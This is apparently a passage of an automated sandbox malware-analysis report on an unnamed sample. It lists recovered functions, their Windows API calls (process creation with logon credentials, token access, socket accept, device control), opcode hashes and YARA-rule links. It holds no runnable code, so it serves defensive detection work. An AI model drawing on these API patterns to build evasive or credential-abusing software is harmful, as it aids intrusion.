OpenProcessToken.ADVAPI32(00000000), ref: 00DCBCE0
CloseHandle.KERNEL32(00000004), ref: 00DCBCFA
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DCBD29

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: d8664cb7e9f3b4963f509d51c0d8502c9b4039ff1ceab1ab9bb767aafaa186f2
Instruction ID: 2da49d54f34b8600d97f06853ff4acac11f7d9337fbfcc6e320e6b5d78360ae2
Opcode Fuzzy Hash: d8664cb7e9f3b4963f509d51c0d8502c9b4039ff1ceab1ab9bb767aafaa186f2
Instruction Fuzzy Hash: 3021807210420AAFCF019FA5DE4AFEE3BA9EF44315F04801AFA01A3160C776CD65DB60

Function 00DF8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00DF88A3
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DF88BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DF88CB
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DF88D9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 57b45dc343867f76bcb3acd6ee48b0c6b1cedb3d2dc67d8b48913d5ef6b25ea2
Instruction ID: 35ca3b24373e9074319a698f3e8378eae314b40f7530e27491627159e829a961
Opcode Fuzzy Hash: 57b45dc343867f76bcb3acd6ee48b0c6b1cedb3d2dc67d8b48913d5ef6b25ea2
Instruction Fuzzy Hash: A8117C31305114AFDB14AB29DC05FBA7BA9EF85360F158119F926D72A1CB64AC009BB5

Function 00DE900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00DE906D
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 00DE907F
accept.WS2_32(00000000,00000000,00000000), ref: 00DE908C
WSAGetLastError.WS2_32(00000000), ref: 00DE90A3

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: b9ea555ae94bdbb5b8c8b8b3578255a0290df77cea26d5fecf6d247857addffc
Instruction ID: cb9767d5ffb23fab41481e81f556b60d988d70a22a4c5bc147d285adddcf8293
Opcode Fuzzy Hash: b9ea555ae94bdbb5b8c8b8b3578255a0290df77cea26d5fecf6d247857addffc
Instruction Fuzzy Hash: 2D215471A041249FCB10DF6ACC95ADABBFCEF49710F04816AF849E7290D774DA45CBA0

Function 00DD18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00DD18FD,?,?,?,00DD26BC,00000000,000000EF,00000119,?,?), ref: 00DD2CB9
Part of subcall function 00DD2CAA: lstrcpyW.KERNEL32(00000000,?,?,00DD18FD,?,?,?,00DD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DD2CDF
Part of subcall function 00DD2CAA: lstrcmpiW.KERNEL32(00000000,?,00DD18FD,?,?,?,00DD26BC,00000000,000000EF,00000119,?,?), ref: 00DD2D10

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00DD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DD1916
lstrcpyW.KERNEL32(00000000,?,?,00DD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DD193C
lstrcmpiW.KERNEL32(00000002,cdecl,?,00DD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DD1970

Strings

cdecl, xrefs: 00DD1967

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 8292f087aeb748c9c4e4c29ad800617844cf4b0402886009b84d9cc081031687
Instruction ID: eaf11f1bb043afd41306b16bcf16cd7f0da436f56d1f74b2e0818f5171aa12b3
Opcode Fuzzy Hash: 8292f087aeb748c9c4e4c29ad800617844cf4b0402886009b84d9cc081031687
Instruction Fuzzy Hash: 1211BE3A200301BFDB25AF74DC65ABA77A8FF44350B44902AF806CB260EB3198418BB1

Function 00DD713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DD715C
_memset.LIBCMT ref: 00DD717D
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00DD71CF
CloseHandle.KERNEL32(00000000), ref: 00DD71D8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: d81a23fd5ad30b5b5a2a194c2cd87b8b040574006210980c460dc2d383eb4784
Instruction ID: 0adba952531de1522289a8558738538ccf088ed1e13008ec54f6bcca519881b5
Opcode Fuzzy Hash: d81a23fd5ad30b5b5a2a194c2cd87b8b040574006210980c460dc2d383eb4784
Instruction Fuzzy Hash: A911CA75905328BAE7205BA5AC4DFEBBA7CEF45760F10429AF504E72D0D2744E848BB4

Function 00DD13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00DD13EE
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DD1409
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DD141F
FreeLibrary.KERNEL32(?), ref: 00DD1474

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 75ee06dfb907a34515d0ee554228e52f54a1055aa5ca7d9cd2e4eca75ae5b0e8
Instruction ID: 5b52cae2c2e4c19425d296e86a63c030731d5a9e9f58ea0f0ba50017179def9f
Opcode Fuzzy Hash: 75ee06dfb907a34515d0ee554228e52f54a1055aa5ca7d9cd2e4eca75ae5b0e8
Instruction Fuzzy Hash: 3D214F79640309BFDB209F91ED88ADABBB8EF00744F00856BE552A7250D774EA48DF71

Function 00DCC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00DCC285
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DCC297
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DCC2AD
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DCC2C8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8dd977b2770c0831e72ee36e059ba4c6e2c50abbb6d23ca2a46bc418c609e079
Instruction ID: 75d7733e836f34aae95fac084e21145dae7861d38b50252b2f587b0327c8242c
Opcode Fuzzy Hash: 8dd977b2770c0831e72ee36e059ba4c6e2c50abbb6d23ca2a46bc418c609e079
Instruction Fuzzy Hash: 4B11367A900218BFDB11DB98C880F9DBBB4FB08710F204095EA04B7294D671AE10DBA4

Function 00DD7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00DD7C6C
MessageBoxW.USER32(?,?,?,?), ref: 00DD7C9F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DD7CB5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DD7CBC

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: e983efbdb3ccce3547353394e12014710f5e5cf5741f2851c155a72253bb941a
Instruction ID: 50f8142bc1db5661636943eed0e718fb38688843f86df3cebc209b667e862f88
Opcode Fuzzy Hash: e983efbdb3ccce3547353394e12014710f5e5cf5741f2851c155a72253bb941a
Instruction Fuzzy Hash: A5110872B08204BFC7029F7DDC08ADE7FAD9B44326F184656F825E3351E67089088770

Function 00DAC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DAC657
GetStockObject.GDI32(00000011), ref: 00DAC66B
SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAC675

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 0092ca0c14cd05da4d6f84c72d506c2dd65660933b1affe2bb5e9889f4b3762f
Instruction ID: 281453a3dc1856c1d825b4da7defb55bf6decc4535a6db28f99e20541fa12d97
Opcode Fuzzy Hash: 0092ca0c14cd05da4d6f84c72d506c2dd65660933b1affe2bb5e9889f4b3762f
Instruction Fuzzy Hash: 8311D672511648BFDF128FA1DC40EEA7B6DFF0A364F095111FA0462160C731DC60DBA0

Function 00DD49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DD354D,?,00DD45D5,?,00008000), ref: 00DD49EE
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00DD354D,?,00DD45D5,?,00008000), ref: 00DD4A13
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DD354D,?,00DD45D5,?,00008000), ref: 00DD4A1D
Sleep.KERNEL32(?,?,?,?,?,?,?,00DD354D,?,00DD45D5,?,00008000), ref: 00DD4A50

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: e49b36f24374f319d3229124af0d6e000ccd0220926fae48b5f451cc9dacc874
Instruction ID: 827f1e4846da4f2de6a321d3261ca032b212c4e86b297d032f78471ad1447f93
Opcode Fuzzy Hash: e49b36f24374f319d3229124af0d6e000ccd0220926fae48b5f451cc9dacc874
Instruction Fuzzy Hash: 0F117931D45528EBCF00EFE6DA88AEEBB78FF09715F005056E985B2240CB309654CBA9

Function 00DC5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00DC5BC6

Part of subcall function 00DC62A5: __fltout2.LIBCMT ref: 00DC62CE

__cftog_l.LIBCMT ref: 00DC5BEC
__cftoe_l.LIBCMT ref: 00DC5C1E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 34818ded4a1a2b28f19defdf84fab26185b510602715188a5c98bf8c67793051
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: BC01403600064EBBCF165F84ED41EEE3F62FF18350B588519FE585A035D236D9B1ABA1

Function 00DB80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DB869D: __getptd_noexit.LIBCMT ref: 00DB869E

__lock.LIBCMT ref: 00DB811F
InterlockedDecrement.KERNEL32(?), ref: 00DB813C
_free.LIBCMT ref: 00DB814F
InterlockedIncrement.KERNEL32(013B6BD8), ref: 00DB8167

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 0a358d42c426181e77101c96bddac7e68220b9b2b37b65fa8961e7e622cb2dd5
Instruction ID: 11ff25ef945ea8bdf5172a08fab1cee34b928f65a1ff698f1c34719de5816410
Opcode Fuzzy Hash: 0a358d42c426181e77101c96bddac7e68220b9b2b37b65fa8961e7e622cb2dd5
Instruction Fuzzy Hash: 9301A135902721DBDB21AF6998067DD7368FF05761F080119F41677290DF249802EBF2

Function 00DB8724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00DB8768

Part of subcall function 00DB8984: __mtinitlocknum.LIBCMT ref: 00DB8996
Part of subcall function 00DB8984: RtlEnterCriticalSection.NTDLL(00DB0127), ref: 00DB89AF

InterlockedIncrement.KERNEL32(DC840F00), ref: 00DB8775
__lock.LIBCMT ref: 00DB8789
___addlocaleref.LIBCMT ref: 00DB87A7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: 70d9beba7b03d05792a86b9a031d6ce507938948e378e11b104ff13072d224f2
Instruction ID: fe94960572413dc3509f5f31b333f39c6b80677e89f21a2694d440b3b616c7f6
Opcode Fuzzy Hash: 70d9beba7b03d05792a86b9a031d6ce507938948e378e11b104ff13072d224f2
Instruction Fuzzy Hash: 6F015B71440B00EFD760AF65D806799B7E4EF40725F20890EE49A972A0CF70A644DF22

Function 00DD9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00DD9C7F

Part of subcall function 00DDAD14: _memset.LIBCMT ref: 00DDAD49

_memmove.LIBCMT ref: 00DD9CA2
_memset.LIBCMT ref: 00DD9CAF
RtlLeaveCriticalSection.NTDLL(?), ref: 00DD9CBF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 07fe20a60e5df686cd7d9bef16e2525123c5c4983e1dbda3a9dda1d8e766ed4e
Instruction ID: 8528fe799bb566c7e475d7c1fc8f0daf733e3f90c5ba428aaa22f403459af4c8
Opcode Fuzzy Hash: 07fe20a60e5df686cd7d9bef16e2525123c5c4983e1dbda3a9dda1d8e766ed4e
Instruction Fuzzy Hash: 5EF03A7A200000AFCF016F55EC85A8ABB29EF45320B08C062FE09AF227C731E815DBB5

Function 00DFE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00DAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DAB5EB
Part of subcall function 00DAB58B: SelectObject.GDI32(?,00000000), ref: 00DAB5FA
Part of subcall function 00DAB58B: BeginPath.GDI32(?), ref: 00DAB611
Part of subcall function 00DAB58B: SelectObject.GDI32(?,00000000), ref: 00DAB63B

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DFE860
LineTo.GDI32(00000000,?,?), ref: 00DFE86D
EndPath.GDI32(00000000), ref: 00DFE87D
StrokePath.GDI32(00000000), ref: 00DFE88B

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 84bb3f9c3e19f150b58f3face767e88fee5aab41710f57c2d8ab53d6e00d4a7a
Instruction ID: 6cafa517c2799560689028fe0e02a768e468563480cf057a8fa923ae1158a146
Opcode Fuzzy Hash: 84bb3f9c3e19f150b58f3face767e88fee5aab41710f57c2d8ab53d6e00d4a7a
Instruction Fuzzy Hash: 88F09A31005259BADB162F51AC09FCA3F9AAF0A311F04C141FB01340E1C379461A8BA5

Function 00DCD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00DCD640
GetWindowThreadProcessId.USER32(?,00000000), ref: 00DCD653
GetCurrentThreadId.KERNEL32 ref: 00DCD65A
AttachThreadInput.USER32(00000000), ref: 00DCD661

Memory Dump Source

